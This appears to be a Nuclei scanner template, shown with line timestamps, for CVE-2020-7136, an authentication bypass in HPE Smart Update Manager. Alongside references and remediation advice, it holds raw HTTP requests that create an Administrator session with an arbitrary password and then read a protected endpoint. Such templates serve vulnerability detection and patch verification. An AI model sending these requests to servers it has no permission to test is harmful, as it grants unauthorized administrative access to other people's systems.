2022-01-11 06:39:41 +00:00
id : CVE-2020-7136
info :
2022-04-29 19:58:07 +00:00
name : HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access
2022-01-11 06:39:41 +00:00
author : gy741
severity : critical
2022-04-29 19:58:07 +00:00
description : HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.
2022-01-11 06:39:41 +00:00
reference :
- https://www.tenable.com/security/research/tra-2020-02
- https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
- https://nvd.nist.gov/vuln/detail/CVE-2020-7136
2022-05-17 09:18:12 +00:00
- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
remediation : Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
2022-01-11 06:39:41 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2022-01-11 06:39:41 +00:00
cve-id : CVE-2020-7136
cwe-id : CWE-288
2022-01-11 08:13:30 +00:00
tags : cve,cve2020,hp,auth-bypass,hpe
2022-01-11 06:39:41 +00:00
requests :
- raw :
- |
POST /session/create HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/json
{"hapi" : {"username" : "Administrator" , "password" : "any_password" , "language" : "en" , "mode" : "gui" , "usesshkey" : true , "privatekey" : "any_privateky" , "passphrase" : "any_passphase" , "settings" : {"output_filter" : "passed" , "port_number" : "444" }}}
2022-01-11 08:13:30 +00:00
- |
GET /session/{{sessionid}}/node/index HTTP/1.1
Host : {{Hostname}}
2022-01-11 06:39:41 +00:00
matchers :
2022-01-11 08:13:30 +00:00
- type : word
part : body
words :
- "hmessage"
- "Command completed successfully."
- "node_name"
condition : and
extractors :
2022-01-11 06:39:41 +00:00
- type : regex
2022-01-11 08:13:30 +00:00
name : sessionid
group : 1
internal : true
2022-01-11 06:39:41 +00:00
part : body
regex :
- '"sessionId":"([a-z0-9.]+)"'
2022-04-29 19:58:07 +00:00
# Enhanced by mp on 2022/04/29